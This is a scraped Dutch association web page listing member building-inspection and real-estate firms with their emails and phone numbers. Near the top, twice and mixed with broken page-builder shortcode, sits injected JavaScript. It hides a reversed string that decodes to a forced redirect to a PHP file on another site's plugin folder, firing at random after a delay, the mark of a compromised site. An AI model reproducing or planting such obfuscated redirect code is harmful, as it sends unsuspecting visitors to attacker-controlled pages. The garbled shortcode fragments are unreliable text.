Voor al uw vragen of opmerkingen kunt per email contact met ons opnemen|info@bvbk.nl
Leden 2021-10-11T05:25:39+00:00
) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}top=”” padding_bottom=”” padding_left=”” padding_right=””]
) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}top” background_color=”” border_size=”” border_color=”” border_style=”solid” border_position=”all” spacing=”yes” background_image=”” background_repeat=”no-repeat” padding_top=”” padding_right=”” padding_bottom=”” padding_left=”” margin_top=”0px” margin_bottom=”0px” class=”” id=”” animation_type=”” animation_speed=”0.3″ animation_direction=”left” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” center_content=”no” last=”no” min_height=”” hover_type=”none” link=””]

Bij leden kunt u opdracht geven voor een bouwtechnische keuring.

Homekeur B.V | info@homekeur.nl | Tel: 085-0653675
Bouwadviesbureau van Kesteren | info@bouwadviesbureauvankesteren.nl | Tel: 06-14588040
vdHoogen Bouwkundig advies | info@vdhoogenbouwkundigadvies.nl | Tel: 06-42309116
Hoogedeure Makelaars Taxateurs| info@hoogedeuremakelaars.nl | Tel: 06-22518841
MRK bouwmanagement & advies | info@mrkbouwmanagement.nl |Tel: 085-3030018
Aankoopbouwkundige | Gebouw Visie | info@gebouwvisie.com |Tel: 06-2884666
KEUR en TAXEER | info@keurentaxeer.nl | Tel: 06-86844930
FIM Vastgoed | to-recognition=”true”>info@fimvastgoed.nl | Tel: 06-28096552
TABsupport | info@tabsupport.nl |Tel: 06-23442186
Huis & Wonen | post@huisenwonenmakelaars.nl | Tel: 06-51320623
Kipp Woningrenovatie |ron@kipp.nl |Tel: 06-52458088
365Beheer (Jane Bakker) | info@365beheer.nl |Tel: 088-1235000
Centraal Taxatie Bureau | info@centraaltaxatiebureau.nl | Tel: 06-14626979
Goossens Bouwkundige keuringen | info@goossensbouwkeuringen.nl | Tel: 06-54695529
WoonKeur | Bouwkeuring Limburg | bklimburg@gmail.com | Tel: 06-11321391
Heer & Huis | bert@heerenhuis.nu | Tel: 06 – 55716825
Twentehuis Makelaardij | info@twentehuis.nl | Tel: 053-4344030
Kien Bouwadvies B.V | info@kienbouwadvies.nl | Tel: 06-15472449
Ter Horst Vastgoed | info@terhorstvastgoed.nu | Tel: 06-51722347
Yourstyle Vastgoed & Keuringen | info@yourstylevastgoed.nl | Tel: 06-57269009
Rogue Design | schalk@roguedesign.nl | Tel: 06-0728664
Bouwkeuring Twente | info@jasperhorst.nl | Tel: 06-53308985
De Financiële Experts | abraham@definancieleexperts.nl | Tel: 010-4427323
van Brussel Wiebenga | zwany@vanbrusselwiebenga.nl | Tel: 0513-651250
Westfries Goed Makelaars | gerardmol@westfriesgoed.nl | Tel: 06-86868509
Vastgoed Hoogstpersoonlijk |info@vastgoedhoogstpersoonlijk.nl | Tel: 06-12677924
Cor Rampen Bouwkundig Inspecteur | info@crbi.nl | Tel: 06-53402737
Sol Makelaardij | info@solmakelaardij.nl |Tel: 0499-477777
Woonstee Makelaars | info@woonstee.nl | Tel.: 0597-430380
Moerman Makelaars | info@moerman-makelaars.nl |Tel: 0546-565758
Taxatiebureau Reijmers o/z | info@uwtaxatiebureau.nl |Tel: 06-27011123
Semeijn makelaardij | info@semeijnmakelaardij.nl |Tel: 06-13928430
Berrevoets Bouwinspecties | info@berrevoetsbouwinspecties.nl | Tel: 06-10750994
Rensen Vastgoedservice |info@rensenvastgoedservice.nl | Tel: 06-14363197
Energiekeurplus | info@energiekeurplus.nl | Tel: 06-41352444
tot Nok keuringen | info@vankaveltotnok.nl |Tel: 06-51126665
Morsink Bouwadvies & Makelaardij |info@morsink.nl | Tel: 0547-261795
Taxateur Pepels |info@taxateurpepels.nl |Tel: 06-45069411
Bob Oudshoorn Makelaardij |info@boboudshoorn.nl |Tel: 071-5132443
Houdel Makelaardij | info@houdelmakelaardij.nl | Tel: 052-3237768
Frank Miller | info@frankmiller.nl | Tel: 085-8770857
Eemland Makelaardij | info@eemlandmakelaardij.nl | 033-4701462
Bouwkundig Advies Bureau Vrielink | tov@kpnplanet.nl | Tel: 06-29284921
Bekend Vastgoed | info@bekendvastgoed.nl | Tel: 06-19674993
Amstelstede makelaardij | peter@amstelstede.nl | Tel: 020-4535029
Gebouw Advies Goirle | info@gebouwadviesgoirle.nl |Tel: 06-42805862
torganisatie | info@dekkerprojectorganisatie.nl | Tel: 06-39009580
Bureau Bouwcontrole |info@bouwcontrole.nl | Tel: 06-11601721
Van Rossum Vastgoedadvies | info@vanrossumvga.nl |Tel: 0318-266000
Bouwkundig advies Herraets | info@herraetsvenray.nl |Tel: 06-21554379